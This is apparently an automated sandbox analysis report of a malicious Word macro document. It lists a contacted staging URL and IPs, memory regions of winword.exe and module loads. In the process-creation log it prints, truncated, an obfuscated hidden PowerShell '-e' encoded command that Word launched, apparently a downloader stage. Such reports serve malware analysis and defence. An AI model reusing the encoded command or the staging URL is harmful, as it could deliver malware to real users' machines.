Persistent Malware | Grouped Behavior
Try VMRay Analyzer
|
The sample contacted only unknown URLs. |
| URL | Connection Successful | Reputation Status |
|---|---|---|
| neakmedia.com/hybfPDcL/ |
|
Unknown
|
| Hostname | IP Addresses | Country | City | Protocols | Has Blacklisted URL |
|---|---|---|---|---|---|
| neakmedia.com | 70.39.145.109 | US | Los Angeles | HTTP, DNS, TCP |
|
| 74.208.155.175 | US | Wayne | TCP |
|
|
| 167.114.121.80 | CA | Montral | TCP |
|
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\office15\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:10, Reason: Analysis Target |
| Unmonitor | End Time: 00:02:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:15 |
| Information | Value |
|---|---|
| PID | 0x9c4 |
| Parent PID | 0x618 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A08
0x
A04
0x
A00
0x
9FC
0x
9F8
0x
9F4
0x
9E0
0x
9DC
0x
9D4
0x
9D0
0x
9C8
0x
A48
0x
A64
0x
A98
0x
B44
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000140000 | 0x00140000 | 0x00143fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x00150000 | 0x001b6fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000200000 | 0x00200000 | 0x00200fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000210000 | 0x00210000 | 0x0021ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000220000 | 0x00220000 | 0x00221fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000230000 | 0x00230000 | 0x0032ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000330000 | 0x00330000 | 0x00360fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000370000 | 0x00370000 | 0x00379fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000380000 | 0x00380000 | 0x0038ffff | Private Memory |
|
|
|
|
|
| pagefile_0x0000000000390000 | 0x00390000 | 0x00396fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003b0000 | 0x003b0000 | 0x003b0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x003d1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000400000 | 0x00400000 | 0x004c7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000004d0000 | 0x004d0000 | 0x005d0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000005e0000 | 0x005e0000 | 0x005e0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000005f0000 | 0x005f0000 | 0x005f0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000600000 | 0x00600000 | 0x00600fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000610000 | 0x00610000 | 0x0062ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000630000 | 0x00630000 | 0x0063ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000640000 | 0x00640000 | 0x0071efff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000720000 | 0x00720000 | 0x00720fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000730000 | 0x00730000 | 0x00730fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000740000 | 0x00740000 | 0x00740fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000750000 | 0x00750000 | 0x00750fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000760000 | 0x00760000 | 0x00760fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000770000 | 0x00770000 | 0x00770fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000780000 | 0x00780000 | 0x00780fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000790000 | 0x00790000 | 0x00790fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000007a0000 | 0x007a0000 | 0x007a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000007b0000 | 0x007b0000 | 0x007b0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000007c0000 | 0x007c0000 | 0x007c0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x00000000007d0000 | 0x007d0000 | 0x007d0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000007e0000 | 0x007e0000 | 0x0081ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000820000 | 0x00820000 | 0x00820fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000830000 | 0x00830000 | 0x00833fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000840000 | 0x00840000 | 0x00840fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000850000 | 0x00850000 | 0x0085ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000860000 | 0x00860000 | 0x0095ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000960000 | 0x00960000 | 0x00a5ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000a60000 | 0x00a60000 | 0x00a60fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000a70000 | 0x00a70000 | 0x00a71fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000a80000 | 0x00a80000 | 0x00a80fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000a90000 | 0x00a90000 | 0x00a90fff | Pagefile Backed Memory | Readable |
|
|
|
|
| msxml6r.dll | 0x00aa0000 | 0x00aa0fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000ab0000 | 0x00ab0000 | 0x00abffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000ac0000 | 0x00ac0000 | 0x00bbffff | Private Memory | Readable, Writable |
|
|
|
|
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db | 0x00bc0000 | 0x00be5fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000bf0000 | 0x00bf0000 | 0x00bf0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000c00000 | 0x00c00000 | 0x00c00fff | Private Memory | Readable, Writable |
|
|
|
|
| winword.exe | 0x00c10000 | 0x00de6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000df0000 | 0x00df0000 | 0x019effff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000019f0000 | 0x019f0000 | 0x01de2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x01df0000 | 0x020befff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000020c0000 | 0x020c0000 | 0x0213ffff | Private Memory | Readable, Writable |
|
|
|
|
| c_1255.nls | 0x02140000 | 0x02150fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002160000 | 0x02160000 | 0x02160fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002170000 | 0x02170000 | 0x02170fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002180000 | 0x02180000 | 0x0227ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002280000 | 0x02280000 | 0x02280fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002290000 | 0x02290000 | 0x02290fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000022a0000 | 0x022a0000 | 0x022a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000022b0000 | 0x022b0000 | 0x022b0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000022c0000 | 0x022c0000 | 0x022c0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000022d0000 | 0x022d0000 | 0x022d0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000022e0000 | 0x022e0000 | 0x022e0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000022f0000 | 0x022f0000 | 0x022f0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002300000 | 0x02300000 | 0x02300fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002310000 | 0x02310000 | 0x02310fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002320000 | 0x02320000 | 0x02320fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002330000 | 0x02330000 | 0x02330fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002340000 | 0x02340000 | 0x02340fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002350000 | 0x02350000 | 0x02350fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002360000 | 0x02360000 | 0x02360fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002370000 | 0x02370000 | 0x02370fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002380000 | 0x02380000 | 0x0239efff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000023a0000 | 0x023a0000 | 0x0249ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000024a0000 | 0x024a0000 | 0x0259ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000025a0000 | 0x025a0000 | 0x025a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000025b0000 | 0x025b0000 | 0x025b0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000025c0000 | 0x025c0000 | 0x025c0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000025d0000 | 0x025d0000 | 0x025d1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| segoeui.ttf | 0x026e0000 | 0x0275efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002770000 | 0x02770000 | 0x027affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000027b0000 | 0x027b0000 | 0x028affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000028e0000 | 0x028e0000 | 0x028effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002900000 | 0x02900000 | 0x029fffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000002a00000 | 0x02a00000 | 0x02dfffff | Pagefile Backed Memory | Readable |
|
|
|
|
| staticcache.dat | 0x02e00000 | 0x0372ffff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000003760000 | 0x03760000 | 0x0385ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003860000 | 0x03860000 | 0x0389ffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000038a0000 | 0x038a0000 | 0x0399ffff | Private Memory | Readable, Writable |
|
|
|
|
| seguisb.ttf | 0x039a0000 | 0x03a03fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000003a10000 | 0x03a10000 | 0x03a4ffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000003ad0000 | 0x03ad0000 | 0x03b0ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003b70000 | 0x03b70000 | 0x03baffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003bd0000 | 0x03bd0000 | 0x03bdffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000003be0000 | 0x03be0000 | 0x043dffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004410000 | 0x04410000 | 0x0450ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004560000 | 0x04560000 | 0x0465ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004700000 | 0x04700000 | 0x0473ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000047b0000 | 0x047b0000 | 0x048affff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000048b0000 | 0x048b0000 | 0x04caffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x04cb0000 | 0x04d6ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000004d70000 | 0x04d70000 | 0x0516ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000005170000 | 0x05170000 | 0x0536ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000005420000 | 0x05420000 | 0x0581ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000005820000 | 0x05820000 | 0x0601ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000006020000 | 0x06020000 | 0x06420fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000006430000 | 0x06430000 | 0x06830fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000006840000 | 0x06840000 | 0x06c40fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000006c50000 | 0x06c50000 | 0x06e4ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000006e50000 | 0x06e50000 | 0x0730ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000007310000 | 0x07310000 | 0x0770ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000007710000 | 0x07710000 | 0x07f0ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000036890000 | 0x36890000 | 0x3689ffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| osppc.dll | 0x63b00000 | 0x63b2cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| riched20.dll | 0x63b30000 | 0x63cbdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| adal.dll | 0x63cc0000 | 0x63d74fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mscoreei.dll | 0x63d80000 | 0x63df9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dwrite.dll | 0x63ed0000 | 0x63fd9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| d3d10warp.dll | 0x63fe0000 | 0x6410bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msores.dll | 0x64110000 | 0x68dfafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mso.dll | 0x68e00000 | 0x6a6e3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wwlib.dll | 0x6a6f0000 | 0x6bbabfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mscoree.dll | 0x6bbc0000 | 0x6bc09fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| d3d11.dll | 0x6bc10000 | 0x6bc92fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msptls.dll | 0x6bca0000 | 0x6bdb5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msointl.dll | 0x6bdc0000 | 0x6c130fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wwintl.dll | 0x6c140000 | 0x6c1fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| d2d1.dll | 0x6c200000 | 0x6c2b9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oart.dll | 0x6c2c0000 | 0x6d067fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msohev.dll | 0x6ed70000 | 0x6ed84fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winspool.drv | 0x6f5b0000 | 0x6f600fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msxml6.dll | 0x6fa80000 | 0x6fbd7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| office.odf | 0x70ac0000 | 0x70fbffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msi.dll | 0x70fc0000 | 0x711fffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcp100.dll | 0x71230000 | 0x71298fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcr100.dll | 0x712a0000 | 0x7135efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
|
For performance reasons, the remaining 194 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | pOwerSheLL -e KAAnADMANgB9ADEAMQA5AHoAMQAxADUAQAA5ADkARwAxADEANABoADEAMAA1AGgAMQAxADIAZQAxADEANgBEADMAMgB9ADYAMQA+ADMAMgBHADEAMQAwAEQAMQAwADEAZQAxADEAOQBHADQANQB6ADEAMQAxAEQAOQA4AH0AMQAwADYAZQAxADAAMQBAADkAOQB9ADEAMQA2AD4AMwAyAD4ANAA1AH0ANgA3AHoAMQAxADEARwAxADAAOQBEADcAOQBlADkAOABoADEAMAA2AGUAMQAwADEAegA5ADkAegAxADEANgB6ADMAMgB6ADgANwA+ADgAMwB6ADkAOQBEADEAMQA0AEcAMQAwADUAfQAxADEAMgBTADEAMQA2AEcANAA2AEQAOAAzAH0AMQAwADQARwAxADAAMQBTADEAMAA4AHoAMQAwADgAdgA1ADkAaAAzADYAegAxADEAOQB9ADEAMAAxAHoAOQA4AD4AOQA5AH0AMQAwADgAPgAxADAANQBEADEAMAAxAHoAMQAxADAAdgAxADEANgB2ADMAMgB6ADYAMQB2ADMAMgBlADEAMQAwAEAAMQAwADEAfQAxADEAOQB2ADQANQBAADEAMQAxAHYAOQA4AHYAMQAwADYAUwAxADAAMQBAADkAOQB6ADEAMQA2AHYAMwAyAGgAOAAzAGgAMQAyADEAPgAxADEANQBEADEAMQA2AHYAMQAwADEAQAAxADAAOQBAADQANgB9ADcAOAA+ADEAMAAxAGgAMQAxADYAUwA0ADYAdgA4ADcAZQAxADAAMQBTADkAOAB9ADYANwBoADEAMAA4AH0AMQAwADUAQAAxADAAMQBlADEAMQAwAEQAMQAxADYAaAA1ADkAUwAzADYAfQAxADEANABAADkANwBlADEAMQAwAEcAMQAwADAAegAxADEAMQB6ADEAMAA5AHoAMwAyAEAANgAxAD4AMwAyAEQAMQAxADAAPgAxADAAMQB6ADEAMQA5AGgANAA1AH0AMQAxADEAaAA5ADgAegAxADAANgBEADEAMAAxAGUAOQA5AGUAMQAxADYAaAAzADIARAAxADEANAB6ADkANwBoADEAMQAwAEcAMQAwADAAPgAxADEAMQBTADEAMAA5AH0ANQA5AEQAMwA2AGUAMQAxADcAegAxADEANABEADEAMAA4AGUAMQAxADUAaAAzADIAfQA2ADEAZQAzADIAZQAzADkAUwAxADAANABHADEAMQA2AEQAMQAxADYAaAAxADEAMgBHADUAOABoADQANwB6ADQANwA+ADEAMQAwAH0AMQAwADEAdgA5ADcAQAAxADAANwBEADEAMAA5AH0AMQAwADEAPgAxADAAMAB9ADEAMAA1AEQAOQA3AD4ANAA2AHYAOQA5AHoAMQAxADEAZQAxADAAOQBTADQANwBAADEAMAA0AGgAMQAyADEAQAA5ADgAUwAxADAAMgBEADgAMAB6ADYAOAB2ADkAOQB6ADcANgB6ADQANwBTADQANABTADEAMAA0AH0AMQAxADYAUwAxADEANgBoADEAMQAyAGUANQA4AEcANAA3AEQANAA3AHoAMQAxADIAZQAxADEANABHADEAMQAyAEQAMQAxADQAUwAxADEAMQB2ADEAMAAwAEcAMQAxADcARwA5ADkAUwAxADEANgBEADEAMAA1AH0AMQAxADEARwAxADEAMAB9ADEAMQA1AEQANAA2AEcAOQA5AD4AMQAxADEAaAAxADAAOQB6ADQANwBlADgAMQBHADEAMAAzAGUANwA0AEQANAA3AHoANAA0AEAAMQAwADQAfQAxADEANgBHADEAMQA2AGgAMQAxADIAQAA1ADgARwA0ADcAUwA0ADcAZQAxADAAOQBTADkANwB9ADEAMAA4AHoAMQAwADgAUwAxADEANwBEADkAOQB6ADEAMAA0AEcANAA2AHYAOQA5AH0AMQAxADEAaAAxADAAOQBEADQANwB2ADcANgBAADYANgBHADQANwB6ADQANAB6ADEAMAA0AEAAMQAxADYAPgAxADEANgBTADEAMQAyAGgANQA4AFMANAA3AGUANAA3AEcAMQAxADAARAAxADEAMQBAADEAMQA0AD4AMQAwADUAUwAxADEAOQB9ADEAMAAxAGgAOQA4AEAANAA2AHYAMQAxADAAQAAxADAAMQBTADEAMQA2AGUANAA3AHYAMQAxADAAfQA4ADQAPgAxADAAOQBlADgAMABoADcAMABlADEAMQA5AFMANAA3AHoANAA0AEcAMQAwADQAfQAxADEANgA+ADEAMQA2AD4AMQAxADIARAA1ADgAUwA0ADcAUwA0ADcAZQAxADEANgBHADkANwB9ADEAMgAwAH0AOQA3AEcAMQAxADYAQAAxADAANQA+ADEAMQAxAEAAMQAxADAAfQA0ADUAZQAxADAANABlADEAMAA3AHoANAA2AHoAOQA5AD4AMQAxADEAZQAxADAAOQB2ADQANwBEADEAMAAwAD4ANwA2AGgAOAAwAFMAMQAyADIARwAxADIAMQBHADQANwA+ADMAOQA+ADQANgB6ADgAMwBlADEAMQAyAFMAMQAwADgAegAxADAANQB9ADEAMQA2AEcANAAwAD4AMwA5AFMANAA0AFMAMwA5AEQANAAxAEcANQA5AEQAMwA2AGgAMQAxADAAegA5ADcAegAxADAAOQBoADEAMAAxAEcAMwAyAEAANgAxAHoAMwAyAEAAMwA2AEAAMQAxADQAZQA5ADcAegAxADEAMABHADEAMAAwAH0AMQAxADEAfQAxADAAOQA+ADQANgB6ADEAMQAwAD4AMQAwADEAfQAxADIAMABHADEAMQA2AD4ANAAwAH0ANAA5AHoANAA0AGgAMwAyAHoANQA0AD4ANQAzAHYANQAzAEAANQAxAEcANQA0AFMANAAxAH0ANQA5AEQAMwA2AHoAMQAxADIAdgA5ADcAQAAxADEANgBHADEAMAA0AHYAMwAyAHYANgAxAGUAMwAyAFMAMwA2AGUAMQAwADEAfQAxADEAMAB6ADEAMQA4AH0ANQA4AHoAMQAxADYAfQAxADAAMQB9ADEAMAA5AEcAMQAxADIAZQAzADIARAA0ADMAdgAzADIAZQAzADkAaAA5ADIAegAzADkAQAAzADIARwA0ADMAZQAzADIAZQAzADYAfQAxADEAMAB2ADkANwB2ADEAMAA5AEQAMQAwADEAdgAzADIAaAA0ADMAUwAzADIAUwAzADkAUwA0ADYAfQAxADAAMQBAADEAMgAwAGUAMQAwADEAUwAzADkAZQA1ADkAZQAxADAAMgBAADEAMQAxAEQAMQAxADQARwAxADAAMQBEADkANwB2ADkAOQB6ADEAMAA0AEAANAAwAEcAMwA2AD4AMQAxADcAUwAxADEANABTADEAMAA4AGUAMwAyAGgAMQAwADUAdgAxADEAMABAADMAMgBlADMANgBTADEAMQA3AGgAMQAxADQARwAxADAAOABEADEAMQA1AGgANAAxAGUAMQAyADMAdgAxADEANgBAADEAMQA0AFMAMQAyADEAdgAxADIAMwB2ADMANgBlADEAMQA5AGUAMQAwADEAaAA5ADgARwA5ADkAfQAxADAAOAB6ADEAMAA1AHoAMQAwADEAfQAxADEAMABEADEAMQA2AGgANAA2AEQANgA4AHYAMQAxADEAUwAxADEAOQBHADEAMQAwAHoAMQAwADgAdgAxADEAMQBEADkANwBTADEAMAAwAGgANwAwAHoAMQAwADUAegAxADAAOAB9ADEAMAAxAH0ANAAwAGUAMwA2AEQAMQAxADcAZQAxADEANAA+ADEAMAA4AD4ANAA2AGgAOAA0AEcAMQAxADEARAA4ADMAfQAxADEANgBoADEAMQA0AH0AMQAwADUAegAxADEAMABAADEAMAAzAD4ANAAwAGUANAAxAGgANAA0AEQAMwAyAH0AMwA2AEcAMQAxADIARAA5ADcAPgAxADEANgBoADEAMAA0AEcANAAxAHoANQA5AEAAOAAzAD4AMQAxADYAPgA5ADcAaAAxADEANABAADEAMQA2AGUANAA1AFMAOAAwAH0AMQAxADQARwAxADEAMQBoADkAOQBAADEAMAAxAH0AMQAxADUARwAxADEANQB2ADMAMgBTADMANgBlADEAMQAyAEQAOQA3AFMAMQAxADYAdgAxADAANAA+ADUAOQBoADkAOABHADEAMQA0AGgAMQAwADEAfQA5ADcAaAAxADAANwB9ADUAOQB6ADEAMgA1AEAAOQA5AEcAOQA3AGUAMQAxADYAPgA5ADkAZQAxADAANABHADEAMgAzAEAAMQAxADkAdgAxADEANAA+ADEAMAA1AGUAMQAxADYAaAAxADAAMQBAADQANQBTADEAMAA0AHoAMQAxADEAaAAxADEANQB2ADEAMQA2AEQAMwAyAGgAMwA2AEAAOQA1AGgANAA2AEcANgA5AD4AMQAyADAAaAA5ADkAUwAxADAAMQBHADEAMQAyAEAAMQAxADYAaAAxADAANQBAADEAMQAxAEQAMQAxADAAUwA0ADYAPgA3ADcAaAAxADAAMQBlADEAMQA1AHoAMQAxADUAPgA5ADcAaAAxADAAMwBAADEAMAAxAGgANQA5AHoAMQAyADUAaAAxADIANQAnACAALQBzAFAAbABJAFQAIAAnAHoAJwAtAFMAcABMAGkAdAAgACcAZQAnACAALQBzAFAAbABpAHQAJwA+ACcAIAAtAFMAcABMAGkAVAAgACcAUwAnAC0AcwBwAGwASQBUACcARAAnAC0AUwBwAGwASQBUACcAfQAnAC0AUwBQAGwAaQB0ACAAJwBHACcALQBzAHAAbABpAHQAJwBoACcALQBTAFAATABpAFQAIAAnAEAAJwAtAFMAcABsAGkAdAAnAHYAJwB8ACAAJQB7ACgAIABbAGkATgB0AF0AJABfACAALQBhAFMAWwBDAGgAYQBSAF0AKQAgAH0AKQAtAGoAbwBpAE4AJwAnACAAfAAgACYAKAAgACQAUABTAEgATwBNAEUAWwAyADEAXQArACQAU | os_pid = 0xa68, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x6d220000 |
|
1 | |
| Load | OLEAUT32.DLL | base_address = 0x76ba0000 |
|
1 | |
| Load | VBE7.DLL | base_address = 0x720d0000 |
|
1 | |
| Get Handle | c:\program files\microsoft office\office15\winword.exe | base_address = 0xc10000 |
|
1 | |
| Get Handle | C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL | base_address = 0x0 |
|
1 | |
| Get Filename | process_name = c:\program files\microsoft office\office15\winword.exe, file_name_orig = C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL, size = 260 |
|
2 | ||
| Get Address | Unknown module name | function = _MsoVBADigSigCallDlg@20, address_out = 0x6d34fe80 |
|
1 | |
| Get Address | Unknown module name | function = _MsoVbaInitSecurity@4, address_out = 0x6d2d8951 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFIEPolicyAndVersion@8, address_out = 0x6d2ccd31 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFAnsiCodePageSupportsLCID@8, address_out = 0x6d2d882e |
|
1 | |
| Get Address | Unknown module name | function = _MsoFInitOffice@20, address_out = 0x6d2ccd4b |
|
1 | |
| Get Address | Unknown module name | function = _MsoUninitOffice@4, address_out = 0x6d2896db |
|
1 | |
| Get Address | Unknown module name | function = _MsoFGetFontSettings@20, address_out = 0x6d281af9 |
|
1 | |
| Get Address | Unknown module name | function = _MsoRgchToRgwch@16, address_out = 0x6d289bae |
|
1 | |
| Get Address | Unknown module name | function = _MsoHrSimpleQueryInterface@16, address_out = 0x6d2834e1 |
|
1 | |
| Get Address | Unknown module name | function = _MsoHrSimpleQueryInterface2@20, address_out = 0x6d283523 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFCreateControl@36, address_out = 0x6d284a26 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFLongLoad@8, address_out = 0x6d381250 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFLongSave@8, address_out = 0x6d381259 |
|
1 | |
| Get Address | Unknown module name | function = _MsoFGetTooltips@0, address_out = 0x6d2bdfac |
|
1 | |
